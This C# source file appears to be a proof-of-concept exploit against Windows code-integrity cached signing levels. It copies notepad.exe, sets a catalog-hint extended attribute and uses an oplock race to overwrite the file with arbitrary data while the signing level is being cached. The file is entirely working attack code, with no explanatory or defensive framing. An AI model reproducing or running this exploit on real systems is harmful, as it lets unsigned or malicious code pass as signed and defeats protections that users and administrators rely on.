﻿using NtApiDotNet;
using System;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

namespace POC
{
    public static class Exploit
    {
        static EaBuffer CreateCatalogHint(string catlog_name)
        {
            MemoryStream stm = new MemoryStream();
            BinaryWriter writer = new BinaryWriter(stm);
            byte[] name = Encoding.UTF8.GetBytes(Path.GetFileName(catlog_name));
            writer.Write((ushort)1);
            writer.Write((ushort)name.Length);
            writer.Write(name);
            return new EaBuffer(new[] { new EaBufferEntry("$CI.CATALOGHINT", stm.ToArray(), EaBufferEntryFlags.None) });
        }

        static string FindCatalogFile()
        {
            string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), 
                "CatRoot", "{F750E6C3-38EE-11D1-85E5-00C04FC295EE}");
            return Directory.EnumerateFiles(path, "*.cat").First();
        }

        static void SetSigningLevelThread(object file)
        {
            try
            {
                NtProcess.Current.SetProcessMitigationPolicy(ProcessMitigationPolicy.Signature, 1);
                Console.WriteLine("In signing thread");
                using (NtSection.CreateImageSection((NtFile)file))
                {
                    Console.WriteLine("Completed signing");
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Signing: {0}", ex);
            }
        }

        static async Task WaitOplock(string catlog_file, NtFile file, byte[] data)
        {
            using (NtFile locked_file = NtFile.Open(NtFileUtils.DosFileNameToNt(catlog_file), 
                null, FileAccessRights.MaximumAllowed))
            {
                Console.WriteLine("Setting Oplock");
                await locked_file.OplockExclusiveAsync();
                Console.WriteLine("Oplock Signaled");
                file.Write(data, 0);
            }
        }
        
        public static void Run(string input, string output)
        {
            string notepad = Path.Combine(Environment.SystemDirectory, "notepad.exe");
            byte[] input_data = File.ReadAllBytes(input);
            File.Copy(notepad, output, true);
            string catlog_file = FindCatalogFile();
            using (NtFile file = NtFile.Open(NtFileUtils.DosFileNameToNt(output), null, 
                FileAccessRights.MaximumAllowed, 
                FileShareMode.None, 0))
            {
                file.SetEa(CreateCatalogHint(catlog_file));
                Task t = WaitOplock(catlog_file, file, input_data);
                Thread thread = new Thread(SetSigningLevelThread);
                thread.Start(file);
                thread.IsBackground = true;
                bool completed = t.Wait(10000);
                thread.Join();

                if (!completed)
                {
                    throw new ArgumentException("Oplock never triggered, exploit failed");
                }

                var signature = file.GetCachedSigningLevel();
                Console.WriteLine("Cached Level: {0}", signature.SigningLevel);
            }
        }
    }
}
